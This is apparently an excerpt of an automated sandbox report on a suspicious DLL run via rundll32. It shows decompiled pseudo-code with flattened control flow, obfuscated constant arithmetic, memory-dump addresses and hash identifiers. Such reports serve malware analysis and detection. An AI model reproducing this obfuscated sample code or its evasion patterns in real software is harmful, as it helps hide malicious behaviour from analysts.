                                                                                                                    							_t1125 = E00348BE3();
                                                                                                                    							_t1317 = 0x6397bd0;
                                                                                                                    							goto L1;
                                                                                                                    						}
                                                                                                                    						__eflags = _t1317 - 0xc7d9b3b;
                                                                                                                    						if(_t1317 != 0xc7d9b3b) {
                                                                                                                    							goto L109;
                                                                                                                    						}
                                                                                                                    						_t1125 = E003351BB();
                                                                                                                    						_t1317 = 0xb2497b0;
                                                                                                                    						goto L1;
                                                                                                                    					}
                                                                                                                    					if(__eflags == 0) {
                                                                                                                    						_t1125 = E00349EEC();
                                                                                                                    						asm("sbb esi, esi");
                                                                                                                    						_t1317 = ( ~_t1125 & 0x03bbde3e) + 0x27d9d92;
                                                                                                                    						goto L1;
                                                                                                                    					}
                                                                                                                    					__eflags = _t1317 - 0x8955e2f;
                                                                                                                    					if(__eflags > 0) {
                                                                                                                    						__eflags = _t1317 - 0x8c1c67e;
                                                                                                                    						if(_t1317 == 0x8c1c67e) {
                                                                                                                    							_t1125 = E00341EE7();
                                                                                                                    							goto L85;
                                                                                                                    						}
                                                                                                                    						__eflags = _t1317 - 0x942db73;
                                                                                                                    						if(_t1317 == 0x942db73) {
                                                                                                                    							_t1125 = E003391B0(_t1237);
                                                                                                                    							goto L114;
                                                                                                                    						}
                                                                                                                    						__eflags = _t1317 - 0xa65551a;
                                                                                                                    						if(_t1317 == 0xa65551a) {
                                                                                                                    							_t1125 = E0033B2C7(_v412, _v268,  &_v36);
                                                                                                                    							_pop(_t1237);
                                                                                                                    							__eflags = _t1125;
                                                                                                                    							if(_t1125 == 0) {
                                                                                                                    								_t1125 = _v28;
                                                                                                                    								__eflags = _t1125;
                                                                                                                    								if(_t1125 == 0) {
                                                                                                                    									_t1314 = E00340AE0(_v260, _v208);
                                                                                                                    									_t1125 = _v28;
                                                                                                                    									_pop(_t1237);
                                                                                                                    								}
                                                                                                                    								__eflags = _t1125 - 1;
                                                                                                                    								if(_t1125 == 1) {
                                                                                                                    									_t1125 = E00340AE0(_v528, _v536);
                                                                                                                    									_pop(_t1237);
                                                                                                                    									_t1314 = _t1125;
                                                                                                                    								}
                                                                                                                    							} else {
                                                                                                                    								_t1314 = _v560;
                                                                                                                    							}
                                                                                                                    							_t1191 = 0x5dcd6da;
                                                                                                                    							_t1317 = 0x53c3717;
                                                                                                                    							goto L1;
                                                                                                                    						}
                                                                                                                    						__eflags = _t1317 - 0xa74297b;
                                                                                                                    						if(_t1317 != 0xa74297b) {
                                                                                                                    							goto L109;
                                                                                                                    						}
                                                                                                                    						_t1125 = E003375F1();
                                                                                                                    						_v100 = _t1125;
                                                                                                                    						_t1317 = 0x1b53ec1;
                                                                                                                    						goto L1;
                                                                                                                    					}
                                                                                                                    					if(__eflags == 0) {
                                                                                                                    						_t1125 = E0034E1D4();
                                                                                                                    						__eflags = _t1125;
                                                                                                                    						if(_t1125 == 0) {
                                                                                                                    							goto L114;
                                                                                                                    						}
                                                                                                                    						_t1317 = 0x1f27ca8;
                                                                                                                    						goto L1;
                                                                                                                    					}
                                                                                                                    					__eflags = _t1317 - 0x6eeee91;
                                                                                                                    					if(_t1317 == 0x6eeee91) {
                                                                                                                    						_t1237 = _v276;
                                                                                                                    						_t1125 = E00332251(_v276,  &_v188,  &_v172, _v420, _v428);
                                                                                                                    						_t1345 = _t1345 + 0xc;
                                                                                                                    						asm("sbb esi, esi");
                                                                                                                    						_t1317 = ( ~_t1125 & 0xfc51161d) + 0x3d71c3c;
                                                                                                                    						goto L1;
                                                                                                                    					}
                                                                                                                    					__eflags = _t1317 - 0x7289877;
                                                                                                                    					if(_t1317 == 0x7289877) {
                                                                                                                    						E0034E1D4();
                                                                                                                    						_t1191 = 0x3fc5519;
                                                                                                                    						_t1125 = E00340AE0(_v584, _v436);
                                                                                                                    						_t1314 = _t1125;
                                                                                                                    						goto L34;
                                                                                                                    					}
                                                                                                                    					__eflags = _t1317 - 0x77c68ce;
                                                                                                                    					if(_t1317 == 0x77c68ce) {
                                                                                                                    						_t1125 = E00345CC4();
                                                                                                                    						_t1317 = 0x8c1c67e;
                                                                                                                    						goto L1;
                                                                                                                    					}
                                                                                                                    					__eflags = _t1317 - 0x8690ed6;
                                                                                                                    					if(_t1317 != 0x8690ed6) {
                                                                                                                    						goto L109;
                                                                                                                    					}
                                                                                                                    					_t1125 = E0034044F();
                                                                                                                    					__eflags = _t1125;
                                                                                                                    					if(_t1125 == 0) {
                                                                                                                    						goto L114;
                                                                                                                    					}
                                                                                                                    					_t1317 = 0x8955e2f;
                                                                                                                    					goto L1;
                                                                                                                    					L109:
                                                                                                                    					__eflags = _t1317 - 0xccbb739;
                                                                                                                    				} while (_t1317 != 0xccbb739);
                                                                                                                    				goto L114;
                                                                                                                    			}
                                                                                                                    0x00342e84
                                                                                                                    0x00342e8f
                                                                                                                    0x00342e9a
                                                                                                                    0x00342ea5
                                                                                                                    0x00342eb0
                                                                                                                    0x00342ebb
                                                                                                                    0x00342ec6
                                                                                                                    0x00342ed1
                                                                                                                    0x00342edc
                                                                                                                    0x00342eef
                                                                                                                    0x00342f02
                                                                                                                    0x00342f05
                                                                                                                    0x00342f0c
                                                                                                                    0x00342f17
                                                                                                                    0x00342f22
                                                                                                                    0x00342f2d
                                                                                                                    0x00342f38
                                                                                                                    0x00342f4e
                                                                                                                    0x00342f55
                                                                                                                    0x00342f60
                                                                                                                    0x00342f6b
                                                                                                                    0x00342f76
                                                                                                                    0x00342f81
                                                                                                                    0x00342f8c
                                                                                                                    0x00342f97
                                                                                                                    0x00342fa9
                                                                                                                    0x00342fae
                                                                                                                    0x00342fb7
                                                                                                                    0x00342fc2
                                                                                                                    0x00342fcd
                                                                                                                    0x00342fd8
                                                                                                                    0x00342fe3
                                                                                                                    0x00342fee
                                                                                                                    0x00342ff9
                                                                                                                    0x00343001
                                                                                                                    0x00343009
                                                                                                                    0x00343011
                                                                                                                    0x0034301c
                                                                                                                    0x00343027
                                                                                                                    0x00343032
                                                                                                                    0x0034303d
                                                                                                                    0x0034304f
                                                                                                                    0x00343054
                                                                                                                    0x0034305d
                                                                                                                    0x00343068
                                                                                                                    0x00343070
                                                                                                                    0x00343078
                                                                                                                    0x00343080
                                                                                                                    0x00343088
                                                                                                                    0x00343090
                                                                                                                    0x00343098
                                                                                                                    0x003430a1
                                                                                                                    0x003430a4
                                                                                                                    0x003430a8
                                                                                                                    0x003430b0
                                                                                                                    0x003430b8
                                                                                                                    0x003430c3
                                                                                                                    0x003430ce
                                                                                                                    0x003430d9
                                                                                                                    0x003430e4
                                                                                                                    0x003430ef
                                                                                                                    0x003430fa
                                                                                                                    0x00343102
                                                                                                                    0x0034310a
                                                                                                                    0x00343115
                                                                                                                    0x00343120
                                                                                                                    0x0034312b
                                                                                                                    0x00343136
                                                                                                                    0x00343141
                                                                                                                    0x0034314c
                                                                                                                    0x00343157
                                                                                                                    0x00343162
                                                                                                                    0x0034316d
                                                                                                                    0x00343178
                                                                                                                    0x00343185
                                                                                                                    0x0034318d
                                                                                                                    0x00343198
                                                                                                                    0x003431a0
                                                                                                                    0x003431a5
                                                                                                                    0x003431aa
                                                                                                                    0x003431af
                                                                                                                    0x003431b7
                                                                                                                    0x003431c7
                                                                                                                    0x003431cb
                                                                                                                    0x003431d0
                                                                                                                    0x003431d5
                                                                                                                    0x003431dd
                                                                                                                    0x003431e8
                                                                                                                    0x003431f3
                                                                                                                    0x003431fb
                                                                                                                    0x00343206
                                                                                                                    0x00343211
                                                                                                                    0x0034321c
                                                                                                                    0x00343227
                                                                                                                    0x0034323c
                                                                                                                    0x0034323f
                                                                                                                    0x00343251
                                                                                                                    0x00343258
                                                                                                                    0x00343263
                                                                                                                    0x0034326e
                                                                                                                    0x00343276
                                                                                                                    0x00343281
                                                                                                                    0x00343289
                                                                                                                    0x00343291
                                                                                                                    0x00343296
                                                                                                                    0x0034329e
                                                                                                                    0x003432a6
                                                                                                                    0x003432b1
                                                                                                                    0x003432b9
                                                                                                                    0x003432c4
                                                                                                                    0x003432cf
                                                                                                                    0x003432d7
                                                                                                                    0x003432df
                                                                                                                    0x003432e7
                                                                                                                    0x003432eb
                                                                                                                    0x003432f3
                                                                                                                    0x00343306
                                                                                                                    0x0034330d
                                                                                                                    0x00343318
                                                                                                                    0x00343323
                                                                                                                    0x0034332e
                                                                                                                    0x00343339
                                                                                                                    0x00343344
                                                                                                                    0x0034335a
                                                                                                                    0x00343369
                                                                                                                    0x0034336a
                                                                                                                    0x00343371
                                                                                                                    0x00343379
                                                                                                                    0x00343384
                                                                                                                    0x0034338f
                                                                                                                    0x003433a0
                                                                                                                    0x003433a7
                                                                                                                    0x003433b2
                                                                                                                    0x003433bd
                                                                                                                    0x003433c8
                                                                                                                    0x003433d3
                                                                                                                    0x003433db
                                                                                                                    0x003433e6
                                                                                                                    0x003433fc
                                                                                                                    0x00343401
                                                                                                                    0x00343412
                                                                                                                    0x00343415
                                                                                                                    0x0034341c
                                                                                                                    0x00343427
                                                                                                                    0x00343432
                                                                                                                    0x0034343a
                                                                                                                    0x00343445
                                                                                                                    0x00343450
                                                                                                                    0x0034345b
                                                                                                                    0x00343466
                                                                                                                    0x00343471
                                                                                                                    0x00343479
                                                                                                                    0x00343484
                                                                                                                    0x0034348f
                                                                                                                    0x003434a2
                                                                                                                    0x003434a9
                                                                                                                    0x003434b4
                                                                                                                    0x003434bf
                                                                                                                    0x003434ca
                                                                                                                    0x003434d5
                                                                                                                    0x003434dd
                                                                                                                    0x003434e5
                                                                                                                    0x003434ed
                                                                                                                    0x003434f8
                                                                                                                    0x00343503
                                                                                                                    0x0034350e
                                                                                                                    0x00343519
                                                                                                                    0x0034352f
                                                                                                                    0x00343536
                                                                                                                    0x00343541
                                                                                                                    0x0034354c
                                                                                                                    0x0034355b
                                                                                                                    0x00343560
                                                                                                                    0x00343569
                                                                                                                    0x00343574
                                                                                                                    0x0034357f
                                                                                                                    0x00343591
                                                                                                                    0x00343596
                                                                                                                    0x0034359f
                                                                                                                    0x003435b1
                                                                                                                    0x003435b4
                                                                                                                    0x003435bb
                                                                                                                    0x003435c6
                                                                                                                    0x003435d1
                                                                                                                    0x003435dc
                                                                                                                    0x003435e7
                                                                                                                    0x003435ef
                                                                                                                    0x003435fa
                                                                                                                    0x00343605
                                                                                                                    0x00343615
                                                                                                                    0x0034361c
                                                                                                                    0x00343627
                                                                                                                    0x00343632
                                                                                                                    0x0034363d
                                                                                                                    0x00343648
                                                                                                                    0x00343653
                                                                                                                    0x0034365d
                                                                                                                    0x00343669
                                                                                                                    0x0034366c
                                                                                                                    0x00343673
                                                                                                                    0x00343677
                                                                                                                    0x0034367f
                                                                                                                    0x00343687
                                                                                                                    0x0034368f
                                                                                                                    0x0034369c
                                                                                                                    0x003436a3
                                                                                                                    0x003436a7
                                                                                                                    0x003436b4
                                                                                                                    0x003436b8
                                                                                                                    0x003436c0
                                                                                                                    0x003436cb
                                                                                                                    0x003436d3
                                                                                                                    0x003436de
                                                                                                                    0x003436e9
                                                                                                                    0x003436f1
                                                                                                                    0x003436fc
                                                                                                                    0x0034370f
                                                                                                                    0x00343710
                                                                                                                    0x00343717
                                                                                                                    0x00343722
                                                                                                                    0x00343e24
                                                                                                                    0x00343e2d
                                                                                                                    0x00343e35
                                                                                                                    0x00000000
                                                                                                                    0x00343e35
                                                                                                                    0x00343c25
                                                                                                                    0x00343c2b
                                                                                                                    0x00343d2d
                                                                                                                    0x00343d33
                                                                                                                    0x00343e0e
                                                                                                                    0x00000000
                                                                                                                    0x00343e0e
                                                                                                                    0x00343d39
                                                                                                                    0x00343d3f
                                                                                                                    0x00343fef
                                                                                                                    0x00000000
                                                                                                                    0x00343fef
                                                                                                                    0x00343d45
                                                                                                                    0x00343d4b
                                                                                                                    0x00343d8c
                                                                                                                    0x00343d91
                                                                                                                    0x00343d92
                                                                                                                    0x00343d94
                                                                                                                    0x00343d9c
                                                                                                                    0x00343da3
                                                                                                                    0x00343da5
                                                                                                                    0x00343dc3
                                                                                                                    0x00343dc5
                                                                                                                    0x00343dcc
                                                                                                                    0x00343dcc
                                                                                                                    0x00343dcd
                                                                                                                    0x00343dd0
                                                                                                                    0x00343deb
                                                                                                                    0x00343df1
                                                                                                                    0x00343df2
                                                                                                                    0x00343df2
                                                                                                                    0x00343d96
                                                                                                                    0x00343d96
                                                                                                                    0x00343d96
                                                                                                                    0x00343df4
                                                                                                                    0x00343df6
                                                                                                                    0x00000000
                                                                                                                    0x00343df6
                                                                                                                    0x00343d4d
                                                                                                                    0x00343d53
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00343d60
                                                                                                                    0x00343d65
                                                                                                                    0x00343d6c
                                                                                                                    0x00000000
                                                                                                                    0x00343d6c
                                                                                                                    0x00343c31
                                                                                                                    0x00343d16
                                                                                                                    0x00343d1b
                                                                                                                    0x00343d1d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00343d23
                                                                                                                    0x00000000
                                                                                                                    0x00343d23
                                                                                                                    0x00343c37
                                                                                                                    0x00343c3d
                                                                                                                    0x00343ce0
                                                                                                                    0x00343cef
                                                                                                                    0x00343cf4
                                                                                                                    0x00343cfb
                                                                                                                    0x00343d03
                                                                                                                    0x00000000
                                                                                                                    0x00343d03
                                                                                                                    0x00343c43
                                                                                                                    0x00343c49
                                                                                                                    0x00343c9e
                                                                                                                    0x00343caa
                                                                                                                    0x00343cbe
                                                                                                                    0x00343cc4
                                                                                                                    0x00000000
                                                                                                                    0x00343cc4
                                                                                                                    0x00343c4b
                                                                                                                    0x00343c51
                                                                                                                    0x00343c81
                                                                                                                    0x00343c86
                                                                                                                    0x00000000
                                                                                                                    0x00343c86
                                                                                                                    0x00343c53
                                                                                                                    0x00343c59
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00343c63
                                                                                                                    0x00343c68
                                                                                                                    0x00343c6a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00343c70
                                                                                                                    0x00000000
                                                                                                                    0x00343fad
                                                                                                                    0x00343fad
                                                                                                                    0x00343fad
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: )If$D}$D}$G$TRr$Y2($\Q$c{v$n)+$orh$rZM*${)t${)t$`$u#$xy
                                                                                                                    • API String ID: 0-2742041174
                                                                                                                    • Opcode ID: 6372f54137c253790d153d4a9b3313068cd14fc9a5abc7ea316d9e3d131886b6
                                                                                                                    • Instruction ID: 33e5bbd3d7d729d0f9f8985e35632297c24178866fffd890dd78578a282e44e8
                                                                                                                    • Opcode Fuzzy Hash: 6372f54137c253790d153d4a9b3313068cd14fc9a5abc7ea316d9e3d131886b6
                                                                                                                    • Instruction Fuzzy Hash: 6EC202715093808BD379DF25C58ABCBBBE1BB85314F11891DE5DA9B260DBB0A948CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E00332BD9(intOrPtr __ecx) {
                                                                                                                    				char _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				char _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				intOrPtr _v56;
                                                                                                                    				char* _v60;
                                                                                                                    				intOrPtr _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				intOrPtr _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				char _v80;
                                                                                                                    				intOrPtr _v84;
                                                                                                                    				char _v88;
                                                                                                                    				char _v92;
                                                                                                                    				char _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				signed int _v108;
                                                                                                                    				signed int _v112;
                                                                                                                    				signed int _v116;
                                                                                                                    				signed int _v120;
                                                                                                                    				signed int _v124;
                                                                                                                    				signed int _v128;
                                                                                                                    				signed int _v132;
                                                                                                                    				signed int _v136;
                                                                                                                    				signed int _v140;
                                                                                                                    				signed int _v144;
                                                                                                                    				signed int _v148;
                                                                                                                    				signed int _v152;
                                                                                                                    				signed int _v156;
                                                                                                                    				signed int _v160;
                                                                                                                    				signed int _v164;
                                                                                                                    				signed int _v168;
                                                                                                                    				signed int _v172;
                                                                                                                    				signed int _v176;
                                                                                                                    				signed int _v180;
                                                                                                                    				signed int _v184;
                                                                                                                    				unsigned int _v188;
                                                                                                                    				signed int _v192;
                                                                                                                    				signed int _v196;
                                                                                                                    				signed int _v200;
                                                                                                                    				signed int _v204;
                                                                                                                    				signed int _v208;
                                                                                                                    				signed int _v212;
                                                                                                                    				signed int _v216;
                                                                                                                    				signed int _v220;
                                                                                                                    				signed int _v224;
                                                                                                                    				signed int _v228;
                                                                                                                    				signed int _v232;
                                                                                                                    				signed int _v236;
                                                                                                                    				signed int _v240;
                                                                                                                    				signed int _v244;
                                                                                                                    				signed int _v248;
                                                                                                                    				signed int _v252;
                                                                                                                    				signed int _v256;
                                                                                                                    				signed int _v260;
                                                                                                                    				signed int _v264;
                                                                                                                    				signed int _v268;
                                                                                                                    				signed int _v272;
                                                                                                                    				signed int _v276;
                                                                                                                    				signed int _v280;
                                                                                                                    				signed int _v284;
                                                                                                                    				signed int _v288;
                                                                                                                    				signed int _v292;
                                                                                                                    				signed int _v296;
                                                                                                                    				signed int _v300;
                                                                                                                    				signed int _v304;
                                                                                                                    				signed int _v308;
                                                                                                                    				signed int _v312;
                                                                                                                    				signed int _v316;
                                                                                                                    				signed int _v320;
                                                                                                                    				signed int _v324;
                                                                                                                    				signed int _v328;
                                                                                                                    				signed int _v332;
                                                                                                                    				signed int _v336;
                                                                                                                    				signed int _v340;
                                                                                                                    				signed int _v344;
                                                                                                                    				signed int _v348;
                                                                                                                    				signed int _v352;
                                                                                                                    				signed int _v356;
                                                                                                                    				signed int _v360;
                                                                                                                    				signed int _v364;
                                                                                                                    				signed int _v368;
                                                                                                                    				signed int _v372;
                                                                                                                    				signed int _v376;
                                                                                                                    				signed int _v380;
                                                                                                                    				signed int _v384;
                                                                                                                    				signed int _v388;
                                                                                                                    				signed int _v392;
                                                                                                                    				signed int _v396;
                                                                                                                    				void* _t716;
                                                                                                                    				void* _t717;
                                                                                                                    				void* _t718;
                                                                                                                    				intOrPtr _t730;
                                                                                                                    				intOrPtr _t732;
                                                                                                                    				void* _t733;
                                                                                                                    				signed int _t735;
                                                                                                                    				void* _t741;
                                                                                                                    				intOrPtr _t746;
                                                                                                                    				intOrPtr _t752;
                                                                                                                    				intOrPtr _t754;
                                                                                                                    				intOrPtr _t755;
                                                                                                                    				void* _t757;
                                                                                                                    				void* _t759;
                                                                                                                    				intOrPtr _t760;
                                                                                                                    				void* _t766;
                                                                                                                    				signed int _t772;
                                                                                                                    				signed int _t773;
                                                                                                                    				signed int _t774;
                                                                                                                    				signed int _t775;
                                                                                                                    				signed int _t776;
                                                                                                                    				signed int _t777;
                                                                                                                    				signed int _t778;
                                                                                                                    				signed int _t779;
                                                                                                                    				signed int _t780;
                                                                                                                    				signed int _t781;
                                                                                                                    				signed int _t782;
                                                                                                                    				void* _t783;
                                                                                                                    				intOrPtr _t792;
                                                                                                                    				void* _t807;
                                                                                                                    				void* _t812;
                                                                                                                    				void* _t842;
                                                                                                                    				intOrPtr _t848;
                                                                                                                    				void* _t864;
                                                                                                                    				intOrPtr _t866;
                                                                                                                    				signed int _t867;
                                                                                                                    				void* _t868;
                                                                                                                    				void* _t873;
                                                                                                                    				signed int* _t875;
                                                                                                                    				void* _t878;
                                                                                                                    
                                                                                                                    				_t875 =  &_v396;
                                                                                                                    				_v56 = 0xa0cd19;
                                                                                                                    				_t873 = 0;
                                                                                                                    				_v84 = __ecx;
                                                                                                                    				_v52 = _v52 & 0;
                                                                                                                    				_t766 = 0x41de8e2;
                                                                                                                    				_v48 = _v48 & 0;
                                                                                                                    				_v300 = 0x1109eb;
                                                                                                                    				_v300 = _v300 + 0xcb;
                                                                                                                    				_v300 = _v300 | 0xecff95c2;
                                                                                                                    				_v300 = _v300 ^ 0xa1bddbbd;
                                                                                                                    				_v252 = 0xe28eec;
                                                                                                                    				_v252 = _v252 + 0x19d6;
                                                                                                                    				_v252 = _v252 | 0xcaf404bd;
                                                                                                                    				_v252 = _v252 ^ 0xcaf6acfe;
                                                                                                                    				_v124 = 0x517500;
                                                                                                                    				_v124 = _v124 + 0x84ec;
                                                                                                                    				_v124 = _v124 ^ 0x0051f9ec;
                                                                                                                    				_v344 = 0xbde49;
                                                                                                                    				_t772 = 0x31;
                                                                                                                    				_v344 = _v344 * 0x35;
                                                                                                                    				_v344 = _v344 << 9;
                                                                                                                    				_v344 = _v344 + 0x7afe;
                                                                                                                    				_v344 = _v344 ^ 0xea0ab4fe;
                                                                                                                    				_v232 = 0xd06c4e;
                                                                                                                    				_v232 = _v232 | 0x98bd8447;
                                                                                                                    				_v232 = _v232 + 0xffff492f;
                                                                                                                    				_v232 = _v232 ^ 0x98fd357e;
                                                                                                                    				_v236 = 0xf2a19d;
                                                                                                                    				_v236 = _v236 << 8;
                                                                                                                    				_v236 = _v236 | 0xeb063d66;
                                                                                                                    				_v236 = _v236 ^ 0xfba7bd66;
                                                                                                                    				_v304 = 0x7cba75;
                                                                                                                    				_v304 = _v304 << 0x10;
                                                                                                                    				_v304 = _v304 >> 0xd;
                                                                                                                    				_v304 = _v304 ^ 0x0005d3a8;
                                                                                                                    				_v220 = 0xced2db;
                                                                                                                    				_v220 = _v220 >> 0xb;
                                                                                                                    				_v220 = _v220 * 0x6a;
                                                                                                                    				_v220 = _v220 ^ 0x000ab444;
                                                                                                                    				_v356 = 0x98a5e4;
                                                                                                                    				_v356 = _v356 ^ 0xdd9204f6;
                                                                                                                    				_v356 = _v356 | 0x4689a95f;
                                                                                                                    				_v356 = _v356 * 0x48;
                                                                                                                    				_v356 = _v356 ^ 0xdf47a2b8;
                                                                                                                    				_v292 = 0x99ac6b;
                                                                                                                    				_v292 = _v292 * 0x35;
                                                                                                                    				_v292 = _v292 / _t772;
                                                                                                                    				_v292 = _v292 ^ 0x00a637e1;
                                                                                                                    				_v348 = 0x8d86f8;
                                                                                                                    				_v348 = _v348 + 0x9ec9;
                                                                                                                    				_v348 = _v348 + 0xfffff441;
                                                                                                                    				_v348 = _v348 * 0x3a;
                                                                                                                    				_v348 = _v348 ^ 0x2031e474;
                                                                                                                    				_v208 = 0x39dd97;
                                                                                                                    				_v208 = _v208 << 0x10;
                                                                                                                    				_v208 = _v208 + 0x9a19;
                                                                                                                    				_v208 = _v208 ^ 0xdd979a19;
                                                                                                                    				_v100 = 0xd2197;
                                                                                                                    				_v100 = _v100 + 0x97e4;
                                                                                                                    				_v100 = _v100 ^ 0x000db95b;
                                                                                                                    				_v324 = 0x771ce;
                                                                                                                    				_v324 = _v324 << 1;
                                                                                                                    				_v324 = _v324 ^ 0x580a954c;
                                                                                                                    				_v324 = _v324 ^ 0x580cba62;
                                                                                                                    				_v352 = 0xd79a55;
                                                                                                                    				_t867 = 0x4d;
                                                                                                                    				_v352 = _v352 / _t867;
                                                                                                                    				_v352 = _v352 << 5;
                                                                                                                    				_v352 = _v352 + 0xffffa0ed;
                                                                                                                    				_v352 = _v352 ^ 0x005b1fb1;
                                                                                                                    				_v264 = 0xbc6795;
                                                                                                                    				_v264 = _v264 + 0x99f5;
                                                                                                                    				_v264 = _v264 | 0xde86e00c;
                                                                                                                    				_v264 = _v264 ^ 0xdeb9ffad;
                                                                                                                    				_v240 = 0x2649df;
                                                                                                                    				_v240 = _v240 + 0x8f57;
                                                                                                                    				_v240 = _v240 + 0xffffdcf3;
                                                                                                                    				_v240 = _v240 ^ 0x002859eb;
                                                                                                                    				_v180 = 0x284ff;
                                                                                                                    				_v180 = _v180 + 0xfffffbe4;
                                                                                                                    				_v180 = _v180 ^ 0x0004b053;
                                                                                                                    				_v248 = 0x43d81c;
                                                                                                                    				_t773 = 0x2c;
                                                                                                                    				_v248 = _v248 * 0x30;
                                                                                                                    				_v248 = _v248 + 0x77f1;
                                                                                                                    				_v248 = _v248 ^ 0x0cb65cea;
                                                                                                                    				_v164 = 0x561af9;
                                                                                                                    				_v164 = _v164 * 0x5f;
                                                                                                                    				_v164 = _v164 ^ 0x1ff767f2;
                                                                                                                    				_v172 = 0x424117;
                                                                                                                    				_v172 = _v172 / _t773;
                                                                                                                    				_v172 = _v172 ^ 0x000edcdb;
                                                                                                                    				_v336 = 0xedf003;
                                                                                                                    				_v336 = _v336 + 0xffff11da;
                                                                                                                    				_v336 = _v336 >> 2;
                                                                                                                    				_v336 = _v336 >> 9;
                                                                                                                    				_v336 = _v336 ^ 0x000c05d4;
                                                                                                                    				_v216 = 0xec53cc;
                                                                                                                    				_v216 = _v216 | 0x30e2710b;
                                                                                                                    				_v216 = _v216 * 0x1f;
                                                                                                                    				_v216 = _v216 ^ 0xeced0588;
                                                                                                                    				_v224 = 0xc36dcc;
                                                                                                                    				_v224 = _v224 * 0x64;
                                                                                                                    				_v224 = _v224 * 0xc;
                                                                                                                    				_v224 = _v224 ^ 0x9413d5fd;
                                                                                                                    				_v148 = 0x5fde01;
                                                                                                                    				_v148 = _v148 ^ 0x51967584;
                                                                                                                    				_v148 = _v148 ^ 0x51c7dbee;
                                                                                                                    				_v156 = 0x26546c;
                                                                                                                    				_v156 = _v156 ^ 0x8ec08bcd;
                                                                                                                    				_v156 = _v156 ^ 0x8eeee361;
                                                                                                                    				_v396 = 0x210674;
                                                                                                                    				_v396 = _v396 ^ 0xb585172f;
                                                                                                                    				_v396 = _v396 >> 9;
                                                                                                                    				_v396 = _v396 ^ 0x5fa8c9ed;
                                                                                                                    				_v396 = _v396 ^ 0x5ff25ba7;
                                                                                                                    				_v112 = 0xa4fdb5;
                                                                                                                    				_v112 = _v112 ^ 0x7ac22777;
                                                                                                                    				_v112 = _v112 ^ 0x7a606cfd;
                                                                                                                    				_v160 = 0x7fe066;
                                                                                                                    				_v160 = _v160 | 0xe6d7910f;
                                                                                                                    				_v160 = _v160 ^ 0xe6fe40a3;
                                                                                                                    				_v152 = 0xb045a1;
                                                                                                                    				_v152 = _v152 ^ 0x0733bf74;
                                                                                                                    				_v152 = _v152 ^ 0x078d93a6;
                                                                                                                    				_v384 = 0x7bd524;
                                                                                                                    				_v384 = _v384 + 0xffff236c;
                                                                                                                    				_v384 = _v384 * 0x7b;
                                                                                                                    				_v384 = _v384 + 0xffffb98b;
                                                                                                                    				_v384 = _v384 ^ 0x3b1735e1;
                                                                                                                    				_v392 = 0x61d9a1;
                                                                                                                    				_v392 = _v392 + 0xab93;
                                                                                                                    				_v392 = _v392 + 0xffff054c;
                                                                                                                    				_v392 = _v392 | 0xc62dc39c;
                                                                                                                    				_v392 = _v392 ^ 0xc661791a;
                                                                                                                    				_v376 = 0x1528d1;
                                                                                                                    				_v376 = _v376 << 8;
                                                                                                                    				_v376 = _v376 + 0xffff31a1;
                                                                                                                    				_v376 = _v376 >> 9;
                                                                                                                    				_v376 = _v376 ^ 0x000f3b72;
                                                                                                                    				_v268 = 0x199e3d;
                                                                                                                    				_v268 = _v268 ^ 0x3c18ecc0;
                                                                                                                    				_v268 = _v268 >> 0xf;
                                                                                                                    				_v268 = _v268 ^ 0x00085298;
                                                                                                                    				_v116 = 0x9d324d;
                                                                                                                    				_t774 = 0x5b;
                                                                                                                    				_v116 = _v116 * 0x35;
                                                                                                                    				_v116 = _v116 ^ 0x2088a224;
                                                                                                                    				_v144 = 0xea008e;
                                                                                                                    				_v144 = _v144 * 0x31;
                                                                                                                    				_v144 = _v144 ^ 0x2cc3d943;
                                                                                                                    				_v200 = 0xbe23d7;
                                                                                                                    				_v200 = _v200 / _t774;
                                                                                                                    				_v200 = _v200 ^ 0x0006a720;
                                                                                                                    				_v368 = 0xbc3a01;
                                                                                                                    				_v368 = _v368 >> 2;
                                                                                                                    				_v368 = _v368 << 1;
                                                                                                                    				_v368 = _v368 | 0x91e27348;
                                                                                                                    				_v368 = _v368 ^ 0x91f48308;
                                                                                                                    				_v312 = 0x81ba05;
                                                                                                                    				_v312 = _v312 ^ 0x6d6d273d;
                                                                                                                    				_v312 = _v312 + 0x9af1;
                                                                                                                    				_v312 = _v312 ^ 0x6ded9aad;
                                                                                                                    				_v320 = 0xa9a2ca;
                                                                                                                    				_v320 = _v320 / _t867;
                                                                                                                    				_t775 = 0x39;
                                                                                                                    				_v320 = _v320 / _t775;
                                                                                                                    				_v320 = _v320 ^ 0x0005ef3e;
                                                                                                                    				_v136 = 0x8e55db;
                                                                                                                    				_t776 = 0xb;
                                                                                                                    				_v136 = _v136 / _t776;
                                                                                                                    				_v136 = _v136 ^ 0x00010f6d;
                                                                                                                    				_v296 = 0x9a02a3;
                                                                                                                    				_v296 = _v296 | 0xc0bbeea6;
                                                                                                                    				_v296 = _v296 ^ 0xfebfff47;
                                                                                                                    				_v296 = _v296 ^ 0x3e0de8e7;
                                                                                                                    				_v196 = 0x628794;
                                                                                                                    				_v196 = _v196 >> 7;
                                                                                                                    				_v196 = _v196 ^ 0x00033c53;
                                                                                                                    				_v360 = 0xc75687;
				_t777 = 0x55;
				_v360 = _v360 / _t777;
				_t778 = 0x4a;
